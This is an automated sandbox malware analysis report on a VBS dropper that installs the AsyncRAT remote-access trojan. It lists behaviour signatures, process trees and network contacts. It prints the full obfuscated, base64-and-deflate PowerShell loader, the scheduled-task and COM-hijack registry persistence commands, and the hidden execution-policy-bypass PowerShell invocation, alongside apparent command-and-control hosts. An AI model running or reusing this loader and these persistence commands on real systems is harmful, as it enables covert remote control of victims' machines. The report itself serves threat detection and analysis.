Malware Analysis Report

2024-11-30 19:34

Sample ID 240918-bnq1mavgrq
Target 5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296.vbs
SHA256 5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296
Tags
execution asyncrat le's do it agilenet discovery persistence privilege_escalation rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296

Threat Level: Known bad

The file 5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296.vbs was found to be: Known bad.

Malicious Activity Summary

execution asyncrat le's do it agilenet discovery persistence privilege_escalation rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Event Triggered Execution: Component Object Model Hijacking

Obfuscated with Agile.Net obfuscator

Checks computer location settings

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-18 01:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-18 01:17

Reported

2024-09-18 01:20

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $udvqhnorgmakexczpfbs = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('JiggJEVudjpDT01zUGVDWzQsMTUsMjVdLUpPaW4nJykoIE5FVy1vYkpFQ3QgIElvLlNUckVBbVJlYWRFUiggKE5FVy1vYkpFQ3QgaW8uY09NUFJlU1Npb04uRGVmTGF0ZVN0UkVhTShbSW8ubUVNb3J5c3RSRWFNXSBbQ29uVmVyVF06OkZyT21CQVNFNjRzVHJpTkcoJ3JWbFpidU13REwySzRSR21NUVJrRGxBWTdUMENBN2xINEx1UHFNMFU5VWdwUlQvU2hhSkk2b21yNGw1L3ptWFpsOFV2aTd0dG4rSG42LzdZejkyRmhVLzM4aWV0ZVJmWjR1cWUrRzlFMm9sQUs1NDR0OHl4Y1E2MnZpeEovci9qY2U3WEttbW0zVUhiOC9sQmUyOXBrOXdiZmg4blZoMldzM0lYQlpURnBPQVM4TGg3dGk1WG44OXRQNnYyOW14UitMR1Izdld4K3RVRkdkK3ZaVW1xMTBmU2ZBVDJzUFQ5T3JmQVJSdlhjTHcxaTE0cnc3VjNmY1Qxc0Jqb0Vmck1SZVF2a3V2UHVPbFk4d21EM2V0NnYwVTFSUVpYUmZDU0RGODRpZzVQNU1RVGdDd3NaQXF4Sk9WSFhLY0Q1SE9WQzB1R2Y2V2pacFBLNXNKSEYzL1FSVlFFeFZHakVjekNySXVqU0dzWEFFRk8zTFdmaEc5Q0pvRHd0OXpOTFRQRnYrTDlKQTMwSVdmeWpFYkhLeDdnRys2MDRnRjNTNlBQZmw1N04vRS8yZDdycmJhSWZkd0tXazg2bzcrWlhOR1ZPRG1iVVptMmJIbGxvRE5MV2Z5TWw4Nkx1a01xU1lJb01SdWordmpMZDNjUy9BNkpUWEV2UWV2QkoyNEpkeXZ5VUtWbEtuWVREUlpBVHlkclQ1dWRhc3JaSk9SWnhBWnVtcVBkVTJ3MUxZQlppWU5XdG01MzRjTE8yVjBWdWxtRVZncG4zemhpMWlkZHhrRzVKS0J6REt5TEIxNlZxYUtWNmE2Z09qYUgzei9PSDhJMSszZ3VzY3VVNHp1Uk1OdGhCVUVhSktHTEQ0Zi9JSGhyOE1rMFE2UnByOEVtdVRuM1VKei9rSFlwenE4bEJlWk1HSDU1bjExR2FsajZ0RnZpb3VYaVB0SEZudTk4dVlzRFZud3FyVHEzS1lxbDlnbDhSMlZwTXIxcUtYT082aHZJV2dBdklOVDdWZ3JueDRucU8wL1Y5YUFXSGx1TmxjNnoyNHhlVXBRWno5S0k1TitESzVHZENXZ0tmcFo3dEJSdGw1K0pEQVJjcEE4Qm5JRmtmYkV5a09rUExEejY1UEZXN3JHcUVOYXJsckFPZG5CdWQ4b0dBbmRNTFk2REdvYWNFZWJpa1grbzJsQ25qQ3hvRC9GK3c5VGVqMTVkcHBPVXZQZTJEVFRidmVaTU16NEdZWlhUQ2VvM0VLM3ZkdXk3VjV4UDdkZG5FTW5hREJlYzl5dHRDT0lvejB4N1NqVVZtUVFpb2swTWNEUVFSNW91d2xxK0dJMUlTZ2pLbWxMNkZtdjRURHd4R2FobHBoNnhLVmJqOGFTZE9TYVNtSVpXWDA1bUpoL1J3VzdJdCtYZ2l0cHVQYXZ4YUw4NE53RzRNdG5MZTlKN3gxcm01WWd4cW9lb3YyMU9PVkcwdFg2NnYycjh3aUJLZHhlQlB4MHZ1dUlPM1dNWWkxcHAvNTJoUWl2d3NuUzkwWmlNNlFsUjFMNXA5VUNkZkdWdGhwWFpwR21PaW9xbldqeG1mUldIdnhwZUlNRU4zenBnV1RHSjJ2Z2tCNUFXdDJTMEUzR0QvUkptVjdXK050bWdGUDZPMUdUR3dldmY5Q0JxUEwxTXZ4enB0VitySnppbjRlY3gyT1ZQakFoZFduc0hNdmdDVlIzQVRtb29NNW40OGVScE9kWGcwVTFuRXVsQWVkeTF5NlpkQTFpaHNVSllhNGQwanBJanJVRTlEV1dxbndsSmI3ejlXOGtKeGdmb1FQVlJSV3NlQjlFQ1hoaVVRUTBRZTh0bkFWWmVuYkJISys5bG8vSElUd2UzVm1pVkwyNEtPMzMxRmI4QVc1Yi8nKSwgW0lvLkNPbXBSZXNzaW9uLmNPTVByRVNTSW9ubU9kZV06OkRFY09NUHJFc3MpKSAsIFtzWVNURW0udEVYdC5FTkNvZEluZ106OmFzY0lpKSApLlJFQUR0T0VuRCgp'));powershell $udvqhnorgmakexczpfbs

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&( $Env:COMsPeC[4,15,25]-JOin'')( NEW-obJECt Io.STrEAmReadER( (NEW-obJECt io.cOMPReSSioN.DefLateStREaM([Io.mEMorystREaM] [ConVerT]::FrOmBASE64sTriNG('rVlZbuMwDL2K4RGmMQRkDlAY7T0CA7lH4LuPqM0U9UgpRT/ShaJI6omr4l5/zmXZl8Uvi7ttn+Hn6/7Yz92FhU/38ieteRfZ4uqe+G9E2olAK544t8yxcQ62vixJ/r/jce7XKmmm3UHb8/lBe29pk9wbfh8nVh2Ws3IXBZTFpOAS8Lh7ti5Xn89tP6v29mxR+LGR3vWx+tUFGd+vZUmq10fSfAT2sPT9OrfARRvXcLw1i14rw7V3fcT1sBjoEfrMReQvkuvPuOlY8wmD3et6v0U1RQZXRfCSDF84ig5P5MQTgCwsZAqxJOVHXKcD5HOVC0uGf6WjZpPK5sJHF3/QRVQExVGjEczCrIujSGsXAEFO3LWfhG9CJoDwt9zNLTPFv+L9JA30IWfyjEbHKx7gG+604gF3S6PPfl57N/E/2d7rrbaIfdwKWk86o7+ZXNGVODmbUZm2bHlloDNLWfyMl86LukMqSYIoMRuj+vjLd3cS/A6JTXEvQevBJ24JdyvyUKVlKnYTDRZATydrT5udasrZJORZxAZumqPdU2w1LYBZiYNWtm534cLO2V0VulmEVgpn3zhi1iddxkG5JKBzDKyLB16VqaKV6a6gOjaH3z/OH8I1+3guscuU4zuRMNthBUEaJKGLD4f/IHhr8Mk0Q6Rpr8EmuTn3UJz/kHYpzq8lBeZMGH55n11Galj6tFviouXiPtHFnu98uYsDVnwqrTq3KYql9gl8R2VpMr1qKXOO6hvIWgAvINT7Vgrnx4nqO0/V9aAWHluNlc6z24xeUpQZz9KI5N+DK5GdCWgKfpZ7tBRtl5+JDARcpA8BnIFkfbEykOkPLDz65PFW7rGqENarlrAOdnBud8oGAndMLY6DGoacEebikX+o2lCnjCxoD/F+w9Tej15dppOUvPe2DTTbveZMMz4GYZXTCeo3EK3vduy7V5xP7ddnEMnaDBec9yttCOIoz0x7SjUVmQQiok0McDQQR5ouwlq+GI1ISgjKmlL6Fmv4TDwxGahlph6xKVbj8aSdOSaSmIZWX05mJh/RwW7It+XgitpuPavxaL84NwG4MtnLe9J7x1rm5Ygxqoeov21OOVG0tX66v2r8wiBKdxeBPx0vuuIO3WMYi1pp/52hQivwsnS90ZiM6QlR1L5p9UCdfGVthpXZpGmOioqnWjxmfRWHvxpeIMEN3zpgWTGJ2vgkB5AWt2S0E3GD/RJmV7W+NtmgFP6O1GTGwevf9CBqPL1MvxzptV+rJzin4ecx2OVPjAhdWnsHMvgCVR3ATmooM5n48eRpOdXg0U1nEulAedy1y6ZdA1ihsUJYa4d0jpIjrUE9DWWqnwlJb7z9W8kJxgfoQPVRRWseB9ECXhiUQQ0Qe8tnAVZenbBHK+9lo/HITwe3VmiVL24KO331Fb8AW5b/'), [Io.COmpRession.cOMPrESSIonmOde]::DEcOMPrEss)) , [sYSTEm.tEXt.ENCodIng]::ascIi) ).READtOEnD()"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www1.coulmandental.com udp
US 34.192.83.212:443 www1.coulmandental.com tcp
US 34.192.83.212:443 www1.coulmandental.com tcp

Files

memory/3048-4-0x000007FEF493E000-0x000007FEF493F000-memory.dmp

memory/3048-5-0x000000001B620000-0x000000001B902000-memory.dmp

memory/3048-7-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

memory/3048-6-0x0000000002860000-0x0000000002868000-memory.dmp

memory/3048-9-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

memory/3048-10-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

memory/3048-8-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

memory/3048-11-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 6d88a181bee8d8aacdf9e0ef1881d4b5
SHA1 4895f61bc96f6c513fe9b23cb9563adea8f0ed62
SHA256 059e74c13adcd39a5ff9d087beb7d7d6c3157c50a3ce4ed336e678123504d8da
SHA512 6865174e3e1bf11884628a3be6694f03193c147f39f8421400f8fc143eb8666ee1458f80e887c0d65f6d48d07db553cf551d2f0982c64c95cd93e201836e2833

memory/3048-17-0x000007FEF493E000-0x000007FEF493F000-memory.dmp

memory/3048-18-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

memory/3048-19-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-18 01:17

Reported

2024-09-18 01:20

Platform

win10v2004-20240802-en

Max time kernel

147s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296.vbs"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2268 wrote to memory of 3620 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2268 wrote to memory of 3620 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3620 wrote to memory of 4048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3620 wrote to memory of 4048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4048 wrote to memory of 4444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 4048 wrote to memory of 4444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 4248 wrote to memory of 4252 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4248 wrote to memory of 4252 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4252 wrote to memory of 1116 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4252 wrote to memory of 1116 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4252 wrote to memory of 1820 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4252 wrote to memory of 1820 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4252 wrote to memory of 4932 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 4252 wrote to memory of 4932 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 4932 wrote to memory of 3500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4932 wrote to memory of 3500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3500 wrote to memory of 772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3500 wrote to memory of 772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3500 wrote to memory of 772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3500 wrote to memory of 772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $udvqhnorgmakexczpfbs = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('JiggJEVudjpDT01zUGVDWzQsMTUsMjVdLUpPaW4nJykoIE5FVy1vYkpFQ3QgIElvLlNUckVBbVJlYWRFUiggKE5FVy1vYkpFQ3QgaW8uY09NUFJlU1Npb04uRGVmTGF0ZVN0UkVhTShbSW8ubUVNb3J5c3RSRWFNXSBbQ29uVmVyVF06OkZyT21CQVNFNjRzVHJpTkcoJ3JWbFpidU13REwySzRSR21NUVJrRGxBWTdUMENBN2xINEx1UHFNMFU5VWdwUlQvU2hhSkk2b21yNGw1L3ptWFpsOFV2aTd0dG4rSG42LzdZejkyRmhVLzM4aWV0ZVJmWjR1cWUrRzlFMm9sQUs1NDR0OHl4Y1E2MnZpeEovci9qY2U3WEttbW0zVUhiOC9sQmUyOXBrOXdiZmg4blZoMldzM0lYQlpURnBPQVM4TGg3dGk1WG44OXRQNnYyOW14UitMR1Izdld4K3RVRkdkK3ZaVW1xMTBmU2ZBVDJzUFQ5T3JmQVJSdlhjTHcxaTE0cnc3VjNmY1Qxc0Jqb0Vmck1SZVF2a3V2UHVPbFk4d21EM2V0NnYwVTFSUVpYUmZDU0RGODRpZzVQNU1RVGdDd3NaQXF4Sk9WSFhLY0Q1SE9WQzB1R2Y2V2pacFBLNXNKSEYzL1FSVlFFeFZHakVjekNySXVqU0dzWEFFRk8zTFdmaEc5Q0pvRHd0OXpOTFRQRnYrTDlKQTMwSVdmeWpFYkhLeDdnRys2MDRnRjNTNlBQZmw1N04vRS8yZDdycmJhSWZkd0tXazg2bzcrWlhOR1ZPRG1iVVptMmJIbGxvRE5MV2Z5TWw4Nkx1a01xU1lJb01SdWordmpMZDNjUy9BNkpUWEV2UWV2QkoyNEpkeXZ5VUtWbEtuWVREUlpBVHlkclQ1dWRhc3JaSk9SWnhBWnVtcVBkVTJ3MUxZQlppWU5XdG01MzRjTE8yVjBWdWxtRVZncG4zemhpMWlkZHhrRzVKS0J6REt5TEIxNlZxYUtWNmE2Z09qYUgzei9PSDhJMSszZ3VzY3VVNHp1Uk1OdGhCVUVhSktHTEQ0Zi9JSGhyOE1rMFE2UnByOEVtdVRuM1VKei9rSFlwenE4bEJlWk1HSDU1bjExR2FsajZ0RnZpb3VYaVB0SEZudTk4dVlzRFZud3FyVHEzS1lxbDlnbDhSMlZwTXIxcUtYT082aHZJV2dBdklOVDdWZ3JueDRucU8wL1Y5YUFXSGx1TmxjNnoyNHhlVXBRWno5S0k1TitESzVHZENXZ0tmcFo3dEJSdGw1K0pEQVJjcEE4Qm5JRmtmYkV5a09rUExEejY1UEZXN3JHcUVOYXJsckFPZG5CdWQ4b0dBbmRNTFk2REdvYWNFZWJpa1grbzJsQ25qQ3hvRC9GK3c5VGVqMTVkcHBPVXZQZTJEVFRidmVaTU16NEdZWlhUQ2VvM0VLM3ZkdXk3VjV4UDdkZG5FTW5hREJlYzl5dHRDT0lvejB4N1NqVVZtUVFpb2swTWNEUVFSNW91d2xxK0dJMUlTZ2pLbWxMNkZtdjRURHd4R2FobHBoNnhLVmJqOGFTZE9TYVNtSVpXWDA1bUpoL1J3VzdJdCtYZ2l0cHVQYXZ4YUw4NE53RzRNdG5MZTlKN3gxcm01WWd4cW9lb3YyMU9PVkcwdFg2NnYycjh3aUJLZHhlQlB4MHZ1dUlPM1dNWWkxcHAvNTJoUWl2d3NuUzkwWmlNNlFsUjFMNXA5VUNkZkdWdGhwWFpwR21PaW9xbldqeG1mUldIdnhwZUlNRU4zenBnV1RHSjJ2Z2tCNUFXdDJTMEUzR0QvUkptVjdXK050bWdGUDZPMUdUR3dldmY5Q0JxUEwxTXZ4enB0VitySnppbjRlY3gyT1ZQakFoZFduc0hNdmdDVlIzQVRtb29NNW40OGVScE9kWGcwVTFuRXVsQWVkeTF5NlpkQTFpaHNVSllhNGQwanBJanJVRTlEV1dxbndsSmI3ejlXOGtKeGdmb1FQVlJSV3NlQjlFQ1hoaVVRUTBRZTh0bkFWWmVuYkJISys5bG8vSElUd2UzVm1pVkwyNEtPMzMxRmI4QVc1Yi8nKSwgW0lvLkNPbXBSZXNzaW9uLmNPTVByRVNTSW9ubU9kZV06OkRFY09NUHJFc3MpKSAsIFtzWVNURW0udEVYdC5FTkNvZEluZ106OmFzY0lpKSApLlJFQUR0T0VuRCgp'));powershell $udvqhnorgmakexczpfbs

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&( $Env:COMsPeC[4,15,25]-JOin'')( NEW-obJECt Io.STrEAmReadER( (NEW-obJECt io.cOMPReSSioN.DefLateStREaM([Io.mEMorystREaM] [ConVerT]::FrOmBASE64sTriNG('rVlZbuMwDL2K4RGmMQRkDlAY7T0CA7lH4LuPqM0U9UgpRT/ShaJI6omr4l5/zmXZl8Uvi7ttn+Hn6/7Yz92FhU/38ieteRfZ4uqe+G9E2olAK544t8yxcQ62vixJ/r/jce7XKmmm3UHb8/lBe29pk9wbfh8nVh2Ws3IXBZTFpOAS8Lh7ti5Xn89tP6v29mxR+LGR3vWx+tUFGd+vZUmq10fSfAT2sPT9OrfARRvXcLw1i14rw7V3fcT1sBjoEfrMReQvkuvPuOlY8wmD3et6v0U1RQZXRfCSDF84ig5P5MQTgCwsZAqxJOVHXKcD5HOVC0uGf6WjZpPK5sJHF3/QRVQExVGjEczCrIujSGsXAEFO3LWfhG9CJoDwt9zNLTPFv+L9JA30IWfyjEbHKx7gG+604gF3S6PPfl57N/E/2d7rrbaIfdwKWk86o7+ZXNGVODmbUZm2bHlloDNLWfyMl86LukMqSYIoMRuj+vjLd3cS/A6JTXEvQevBJ24JdyvyUKVlKnYTDRZATydrT5udasrZJORZxAZumqPdU2w1LYBZiYNWtm534cLO2V0VulmEVgpn3zhi1iddxkG5JKBzDKyLB16VqaKV6a6gOjaH3z/OH8I1+3guscuU4zuRMNthBUEaJKGLD4f/IHhr8Mk0Q6Rpr8EmuTn3UJz/kHYpzq8lBeZMGH55n11Galj6tFviouXiPtHFnu98uYsDVnwqrTq3KYql9gl8R2VpMr1qKXOO6hvIWgAvINT7Vgrnx4nqO0/V9aAWHluNlc6z24xeUpQZz9KI5N+DK5GdCWgKfpZ7tBRtl5+JDARcpA8BnIFkfbEykOkPLDz65PFW7rGqENarlrAOdnBud8oGAndMLY6DGoacEebikX+o2lCnjCxoD/F+w9Tej15dppOUvPe2DTTbveZMMz4GYZXTCeo3EK3vduy7V5xP7ddnEMnaDBec9yttCOIoz0x7SjUVmQQiok0McDQQR5ouwlq+GI1ISgjKmlL6Fmv4TDwxGahlph6xKVbj8aSdOSaSmIZWX05mJh/RwW7It+XgitpuPavxaL84NwG4MtnLe9J7x1rm5Ygxqoeov21OOVG0tX66v2r8wiBKdxeBPx0vuuIO3WMYi1pp/52hQivwsnS90ZiM6QlR1L5p9UCdfGVthpXZpGmOioqnWjxmfRWHvxpeIMEN3zpgWTGJ2vgkB5AWt2S0E3GD/RJmV7W+NtmgFP6O1GTGwevf9CBqPL1MvxzptV+rJzin4ecx2OVPjAhdWnsHMvgCVR3ATmooM5n48eRpOdXg0U1nEulAedy1y6ZdA1ihsUJYa4d0jpIjrUE9DWWqnwlJb7z9W8kJxgfoQPVRRWseB9ECXhiUQQ0Qe8tnAVZenbBHK+9lo/HITwe3VmiVL24KO331Fb8AW5b/'), [Io.COmpRession.cOMPrESSIonmOde]::DEcOMPrEss)) , [sYSTEm.tEXt.ENCodIng]::ascIi) ).READtOEnD()"

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f

C:\Windows\system32\cmd.exe

cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 www1.coulmandental.com udp
US 34.192.83.212:443 www1.coulmandental.com tcp
US 8.8.8.8:53 212.83.192.34.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 88.119.175.153:8808 tcp
US 8.8.8.8:53 153.175.119.88.in-addr.arpa udp

Files

memory/3620-0-0x00007FFCA0693000-0x00007FFCA0695000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i552myhl.png.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3620-10-0x0000019950F80000-0x0000019950FA2000-memory.dmp

memory/3620-11-0x00007FFCA0690000-0x00007FFCA1151000-memory.dmp

memory/3620-12-0x00007FFCA0690000-0x00007FFCA1151000-memory.dmp

memory/3620-22-0x00007FFCA0693000-0x00007FFCA0695000-memory.dmp

memory/3620-23-0x00007FFCA0690000-0x00007FFCA1151000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8d089c855358969266a3275f0ec4f955
SHA1 5ce30b598cfa0c2008541b1b549673401971dc3d
SHA256 e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734
